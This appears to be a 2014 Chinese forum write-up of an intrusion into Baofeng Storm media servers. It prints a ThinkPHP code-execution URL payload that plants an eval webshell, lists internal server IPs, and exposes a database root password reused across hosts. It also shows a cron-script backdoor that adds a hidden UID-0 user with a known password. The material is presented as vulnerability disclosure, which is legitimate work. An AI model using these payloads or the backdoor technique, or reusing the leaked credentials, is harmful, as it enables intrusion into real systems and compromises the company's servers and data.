漫游暴风影音并发现一系列安全问题下载

来源：黑吧安全网　浏览：657次　时间：2014-06-12

暴风影音某日志伺服器存在代码执行，由于运维疏忽导致其某台服务器私钥泄露和一系列安全问题
panxiaodong同学，你惹大祸了，怎么能这么管理服务器呢
部分支持外联的数据库和敏感信息已打码，快整改吧~
（在整个过程中未做任何恶意篡改）

http://config.baofeng.com

这台伺服器使用了thinkphp框架并未打补丁，之前的代码执行成功利用

http://config.baofeng.com/index.php/module/action/param1/{${phpinfo()}}

http://config.baofeng.com/index.php/module/action/param1/{${eval($_POST[s])}}

成功getshell

随后发现站点做了cdn，获取了其几个IP后，依次翻看

221.238.27.174

60.28.110.197

117.79.151.24

211.100.58.83

117.79.151.23

这几台主机，在/opt/programs/sifu/Conf/下发现数据库配置文件

<?php 

 return array(   

 	'URL_MODEL'=>1, // 如果你的环境不支持PATHINFO 请设置为3

	'SESSION_AUTO_START' =>false,

	'DB_TYPE'=>'mysql',

	'DB_HOST'=>'***.***.**.174',

	'DB_NAME'=>'sifu_repair',

	'DB_USER'=>'root',

	'DB_PWD'=>'223238',

	'DB_PORT'=>'3306',

	'DB_PREFIX'=>'sifu_',

        'APP_DEBUG' => 0,

    	'HTML_CACHE_ON' => true,//开启静态缓存  

    	'HTML_PATH' => '/opt/sifu/sifu/pop',//静态缓存文件目录，HTML_PATH可任意设置，此处设为当前项目下新建的html目录

 	'MEMCACHE_HOST'=>'221.238.27.174',//memcache主机ip配置

 	'MEMCACHE_PORT'=>'11211', //memcache端口配置

        'ACCESS_IPS'=>'192.168.%,127.0.0.1,218.***.***.34,60.***.**.102',//允许访问ip地址配置，%为通配符

	'LOG_RECORD'=>false,

);

?>

发现居然统一口令。。。。给跪

223238是你们的电话号码么

打码两台貌似是数据分析的监测平台，避免信息漏点，就不贴图了

继续翻看，在117.79.151.23这台中，

/opt/script/发现了两个python脚本

成功在飞信登陆

这是可以给员工发短信的节奏了么

panxiaodong同学。。。唔，应该是苦逼的运维同学吧

成功登陆暴风影音邮箱

以上都是小事，接下来可能导致的问题才是正片

0x01

测试过程中，发现/opt/programs/sifu/result/下所生成的日志文件都是root，并且每天定时更新，追根溯源，找到了生成日志的脚本文件

#!/bin/bash

###################

#计算伺服总请求数量

#福玉 2011116

###################



stat_date=`date -d "1 days ago" +"%Y%m%d"`

stat_date1=`date -d "1 days ago" +"%Y%m%d"`

echo $stat_date

zcat /opt/data/logs/sifu/access_$stat_date*|awk -F'=' '{print $2}'|awk -F'&' '{print $1}'|sort |uniq -c|awk -F' ' '{print $1"\t"$2"\t24"}' > /opt/programs/sifu/result/request_$stat_date.csv



/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8;delete from sifu_scheme_request_data where ip='24' and stat_date=${stat_date1}";

/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8;  load data local infile '/opt/programs/sifu/result/request_${stat_date}.csv' replace into table sifu_scheme_request_data (count,version,ip) set stat_date=${stat_date1};"

并且发现www的组有可写权限

于是乎，加了这么一条命令

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash website -p $1$K3gq/1E2$afsX.mfcBaLXIIItgz29Q.asdf=123

也就是说，在系统执行cron计划任务的时候，除了以root权限生成每天的日志，还会添加一个用户名为website，密码为asdf=123的root用户

以此来达到提升权限的目的

0x02

在用户目录下，翻看.bash_history

su -c "ssh -t uniondown@61.155.220.222 sudo ln -s /opt/baofeng-data/league/package/3.10.06.30.exe /opt/baofeng-data/league/package/3.10.06.30_124.exe" uniondown;

exit

ssh-keygen -d

ls

cd ~

ls

ls -a